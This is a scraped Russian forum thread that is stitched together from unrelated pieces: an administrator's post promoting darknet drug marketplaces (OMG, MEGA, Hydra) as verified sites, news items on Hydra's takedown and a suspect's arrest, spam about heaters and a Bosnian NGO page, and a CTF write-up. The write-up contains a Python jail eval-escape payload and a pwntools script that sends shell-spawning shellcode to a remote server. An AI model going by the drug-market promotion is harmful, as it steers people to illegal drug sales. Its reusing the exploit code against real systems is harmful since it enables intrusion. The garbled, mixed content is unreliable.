Адреса онион сайтов

Wyrypa

Администратор
Подтвержденный
Сообщения
729
Реакции
17
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Caxaz

Продвинутый юзер
Сообщения
59
Реакции
14
Адреса онион сайтов
Итоги 62.122.214.47:27015omg-CSS
---------------------------------------------------------------------------------------------------------------------—
Доброго ramp времени суток.
==============================
Победитель === "The_Gh0sT"Vollständig anzeigen…
==============================
Кто не официальный победил, но учавствовал, просьба не расстраиваться))
-----------------------------------------—
Следующий конкурс будет через 2-3 часа
-------------------------------------------
Прошу прощения, что без видео, но на данный момент занят и сайт снимать видео некогда =( по этому просто скрин
===============================
Приятной игры
Спасибо что остаетесь с нами
 
A

Ahicak

Пассажир
Сообщения
33
Реакции
18
)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a .pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside,  bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if ( !(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
Адреса онион сайтов
 

Igevunip

Продвинутый юзер
Сообщения
102
Реакции
16
Власти США назвали первого подозреваемого в деле даркнет-ресурса omg. Это 30-летний Дмитрий Павлов из Череповца: его американский минюст считает администратором серверов "Гидры" - крупнейшей в России площадки для продажи наркотиков. Сам Павлов заявил Би-би-си, что конечных клиентов не знал. А если бы знал, что это "ОМГ", то прекратил бы сотрудничество.По версии минюста США, сервера площадки администрировал 30-летний россиянин Дмитрий Павлов."Он, вместе с другими операторами omg, обеспечивал успех площадки, предоставляя ей критическую инфраструктуру", - говорится в обвинительном заключении суда Северного округа Калифорнии.Семье Павлова принадлежит хостинг-провайдер из Череповца "Промсервис", который, по данным минюста США, работал под разными коммерческими именами (в том числе 4x4Host). Американские власти утверждают, что именно эта компания занималась администрированием серверов omg, начиная с 2015 года.Павлов заявил Би-би-си, что американские власти на него не выходили, и про обвинения он узнал от журналиста."Мы являемся хостинг-компанией и имеем все необходимые лицензии связи Роскомнадзора. Мы не занимаемся администрированием никаких площадок в принципе, а только предоставляем сервера в аренду как посредники (перепродавая услуги). Мы не знаем, что у нас хостится, так как после предоставления доступа к серверу клиенты меняют пароль, и доступ невозможен", - написал он.И добавил, что если он бы он знал, что находится на серверах, то "не предоставил бы оборудование ни под каким предлогом"."В любом случае, понимая всю ответственность, мы готовы к содействию со специальными службами", - пообещал он.Павлов - уроженец Череповца, но в Петербурге зарегистрирована его компания "Русинмедиа", которая занимается строительством центров обработки данных (выручка в 2021 году - около 2 млн рублей). Из Петербурга и большинство его друзей "ВКонтакте". Но сам он отказался отвечать на вопрос, где живет сейчас.Американские и германские власти называют "Гидру" крупнейшим нелегальным даркнет-рынком в мире, хотя основная его аудитория сосредоточена в России. По оценке Федерального ведомства уголовной полиции Германии, только в 2020 году продажи на "Гидре" составили не менее 1,23 млрд евро. Русскоязычный маркетплейс, на котором можно было купить наркотики и некоторые виды поддельных документов, работал с 2015 года.Хотя основной профиль "Гидры" - торговля наркотиками, известен как минимум один случай, когда через эту площадку фактически было заказано убийство человека - подмосковного следователя Евгении Шишкиной. Об этой истории подробно писала Русская служба Би-би-си.Накануне, 5 апреля, американские правоохранительные органы совместно с немецкой полицией провели совместную операцию, в рамках которой были отключены сервера "Гидры" в Германии, а также конфискованы биткоины на сумму в 25 млн долларов. Управление по контролю за иностранными активами (OFAC) министерства финансов США назвало площадку "раем для киберпреступников".Судя по всему, немецкие сервера, на которых работала "ОМГ", арендовала компания Павлова. Но тот уверяет, что немцы никогда не сообщали ему, что на его инфраструктуре работает даркнет-площадка. "Любые инциденты, присланные немецким оператором, разбирались, и сервера удалялись, если были какие то нарушения", - утверждает он.Как бы то ни было, теперь американские власти обвиняют его в сговоре с целью продажи наркотиков и в отмывании денег.В 2015 году Росс Ульбрихт, основатель предшественника omg в даркнете - площадки Silk Road - был приговорен американскими властями к пожизненному заключению.
 
Y

Yvakoki

Продвинутый юзер
Сообщения
97
Реакции
18
ContactWarm flames breathe & glow with realistic logs & embers, bringing your fireplace to lifeManually controlled Vented log sets are perfect for chimneyed fireplacesVent-Free logs are a great option where you don't have a flu. Models include Thermostat, Remote, or Manual controlsRemote models have a unique self-charging feature that allows the battery to be re-charged by the flameLearn More »Vent-Free heating provides supplemental heat to rooms allowing energy savingsNo vent pipes needed, keeping all the heat in the room and installation costs at a minimum.Oxygen Depletion Sensor (ODS) turns the heater off if the oxygen drops below a safe level.No Electricity needed. Great during power failuresLearn More »Torpedo Heaters are great for construction sites and outdoor tented areas that have good ventilation.High Quality Danfoss Gear pumpAutomatic ignitionOver Heat ProtectionElectronic Thermostat with Digital DisplayLearn More »Infared Radiant waves heat the object and not the air making it ideal for outdoor applications or construction areas with good ventilationPiezo IgnitionFar more portable than traditional patio heatersGreat for tailgatingLearn More »The Thermablaster Industrial Electric heaters are perfect for workshops with high ceilings and large floor space.Heat Output: 14000 BTU & 17000 BTUElectric blower heater for professional purposesDurable stainless steel heating elementThermostat controlLearn More »BLOG12.12.16THERMABLASTER Remote Log Sets with Dr. Frank on CBS TV PittsburghRead More04.28.16Thermablaster by Reecon will be attending the National Hardware Show in Las Vegas on May 4th through May 6th!Thermablaster by Reecon will be attending the National... Read More12.03.15Thermablaster Outdoor Infrared Heaters on GroupOn!https://www.groupon.com/deals/gg-thermablaster-outdoor-infrared-heaters Thermablaster Outdoor Infrared Heaters are now available... Read More
 
E

Evewew

Продвинутый юзер
Сообщения
65
Реакции
2
  Kalemegdanska 1878000 Banja Luka+387 51 462 146 Fax:+387 51 463 143office @unitedwomenbl.org11. Maja2022.HomeNovostiO namaIstorijatVizija,misija i strateški pravciDonatoriOsobljeVideogalerijaGalerijaslikaProgramiPolitičko učešće ženaO programuZavršeniprojektiTekućiprojektiPomoć za ženeSIGURNA KUĆA ZA ŽENE I DJECU ŽRTVE NASILJA BANJA LUKASOSTELEFON ZA ŽRTVE NASILJA 1264PRAVNOSAVJETOVALIŠTERodno zasnovano nasiljeO programuZavršeniprojektiTekućiprojektiPublikacijeRODNOZASNOVANO NASILJEPOLITIČKOUČEŠĆE ŽENAŽENE IMEDIJIGODIŠNJIIZVJEŠTAJISTRATEŠKIPLANOVIOstaloVolontiranjeResursni CentarEkonomskoosnaživanjeOnlineedukacijaKonkursi zaposaoGrupesamopomoćiJavnipoziviKontaktHomeNovostiO namaIstorijatVizija,misija i strateški pravciDonatoriOsobljeVideogalerijaGalerijaslikaProgramiPolitičko učešće ženaO programuZavršeniprojektiTekućiprojektiPomoć za ženeSIGURNA KUĆA ZA ŽENE I DJECU ŽRTVE NASILJA BANJA LUKASOSTELEFON ZA ŽRTVE NASILJA 1264PRAVNOSAVJETOVALIŠTERodno zasnovano nasiljeO programuZavršeniprojektiTekućiprojektiPublikacijeRODNOZASNOVANO NASILJEPOLITIČKOUČEŠĆE ŽENAŽENE IMEDIJIGODIŠNJIIZVJEŠTAJISTRATEŠKIPLANOVIOstaloVolontiranjeResursni CentarEkonomskoosnaživanjeOnlineedukacijaKonkursi zaposaoGrupesamopomoćiJavnipoziviKontaktHomeNovostiO namaIstorijatVizija,misija i strateški pravciDonatoriOsobljeVideogalerijaGalerijaslikaProgramiPolitičko učešće ženaO programuZavršeniprojektiTekućiprojektiPomoć za ženeSIGURNA KUĆA ZA ŽENE I DJECU ŽRTVE NASILJA BANJA LUKASOSTELEFON ZA ŽRTVE NASILJA 1264PRAVNOSAVJETOVALIŠTERodno zasnovano nasiljeO programuZavršeniprojektiTekućiprojektiPublikacijeRODNOZASNOVANO NASILJEPOLITIČKOUČEŠĆE ŽENAŽENE IMEDIJIGODIŠNJIIZVJEŠTAJISTRATEŠKIPLANOVIOstaloVolontiranjeResursni CentarEkonomskoosnaživanjeOnlineedukacijaKonkursi zaposaoGrupesamopomoćiJavnipoziviKontaktNovostiOBAVJEŠTENJE O NABAVCI  NOVOG  PUTNIČKOG MOTORNOG  VOZILAAdd CommentOBAVJEŠTENJE O NABAVCI  NOVOG  PUTNIČKOG MOTORNOG  VOZILA Obavještavaju se  privredni subjektikoji se bave predmetnom djelatnošću da imamo namjeru...NovostiOBAVJEŠTENJE O NABAVCI pogonskog motornog gorivaAdd CommentNovostiPonovljeni poziv za podnošenje projektnih prijedloga organizacijacivilnog društva u BiH koje provode aktivnosti u oblastisprečavanja i suzbijanja rodno zasnovanog nasiljaAdd CommentNovostiKampanja “Zaposlenjem prekidamo začarani krug nasilja”Add CommentNovostiProjekcija dokumentarnog filma „Danijela“Add CommentNovostiNovostiPOZIV ZA PODNOŠENJE PROJEKTNIH PRIJEDLOGA ORGANIZACIJA ČLANICASIGURNE MREŽE BOSNE I HERCEGOVINE17.Februara 2022.NovostiJavni poziv10.Februara 2022.NovostiSaopštenje za javnost – Svaki minut je važan!21.Januara 2022.NovostiJavni poziv5. Januara2022.NovostiEdukacija za senzibilisan pristup pružaoca usluga podrške ženama idjeci žrtvama nasilja29.Decembra 2021.NovostiPregled aktivnosti, april-septembar, 202115.Decembra 2021.NovostiJavni poziv3.Decembra 2021.NovostiZajednički kalendar aktivnosti za kampanju 16 Dana aktivizma protivrodnog nasilja u BIH za 2021. godinu24.Novembra 2021.NovostiUnapređenje podrške rehabilitaciji i renitegraciji žena koje supreživjele nasilje19.Novembra 2021.Video NovostiNovosti • VideoJačanje multisektorske saradnje u zaštiti žena od rodno zasnovanognasilja25.Decembra 2017.Add CommentVideo NovostiPogledaj sve...Novosti • VideoJačanje multisektorske saradnje u zaštiti žena od rodno zasnovanognasilja25.Decembra 2017. Novosti • VideoMedijske aktivnosti u okviru 16 dana aktivizma5.Decembra 2017.VideoPoložaj žene u društvu, Fondacija “Udružene žene” Banja Luka uemisiji “U fokusu” na javnom servisu RTRS1.Novembra 2017. VideoPROTOKOL5. Oktobra2015. VideoSigurna Kuca4. Oktobra2015. VideoPotpisujem20. Aprila2015.Drugi o namaNemam nikakvih sugestija za unapreñenje rada Fondacije Udruženežene jer iskreno mislim da rade fantastičan posao, da su izuzetnohrabre kao kolektiv i da su učinile jako puno na poboljšanjupoložaja žena u BiH, puno više od mnogih političarki / žena narukovodećim pozicijama.DIJANA PEJIĆ
članica UO,, izvršna direktorica NVO “Genesis Project”Drugi o namaZnam da se uvijek može bolje. Ali ja uistinu u ovom trenutku neznam što sugerirati za unaprijeñenje rada organizacije. Sve o čemugovore one i sprovode u djelo i to je ono najvažnije po čemu suprepoznatljive!!!MARIJA ZELENIKApredsjednica, Zajednica žena HDZ-a BIH Kraljica KatarinaKosačaNajčitanijeOBAVJEŠTENJE O NABAVCI  NOVOG  PUTNIČKOG MOTORNOG  VOZILAOBAVJEŠTENJE O NABAVCI pogonskog motornog gorivaPonovljeni poziv za podnošenje projektnih prijedloga organizacijacivilnog društva u BiH koje provode aktivnosti u oblastisprečavanja i suzbijanja rodno zasnovanog nasiljaADDRESSKalemegdanska 18, Banja Luka.
Bosna i HercegovinaPHONE NO+387 51 462 146 / +387 51 463 143EMAIL ID [email protected] ADDRESS www.unitedwomenbl.orgCopyright © 2018. Created by GoodDesign.DownloadThank you for your download, we hope you are satisfied with oursoftware.Cancel Click hereto download
 

Ygudu

Продвинутый юзер
Сообщения
70
Реакции
3
Мещанский суд Москвы арестовал предполагаемого сооснователя крупнейшей онлайн-площадки по продаже наркотиков omg ("ОМГ") Дмитрия Павлова. В базе данных на сайте суда указывается, что мера пресечения в отношении Павлова Д.О. в виде заключения под стражу была избрана по ходатайству следствия судом 11 апреля. Агентство ТАСС сообщает 14 апреля, что речь идет именно об одном из основателей "Гидры", у которого есть 10 дней на обжалование судебного решения, пока еще не вступившего в законную силу.Задержанный обвиняется в незаконном сбыте наркотических средств в особо крупном размере, за который предполагается наказание до 20 лет колонии.В карточке дела не уточняется, идет ли речь о заочном аресте или реальном.Германия закрыла крупнейший магазин в даркнете5 апреля власти Германии закрыли русскоязычный магазин в даркнете omg, изъяв 543 биткоина на сумму 23 миллиона евро. В тот же день министерство торговли США ввело санкции в отношении этой крупнейшей в мире нелегальной торговой площадки.Магазин omg Market в теневом секторе интернета, в котором велась торговля наркотиками, поддельными документами и нелегальными услугами, существовал с 2015 года и был доступен через сеть Tor.Смотрите также:
 
Сверху Снизу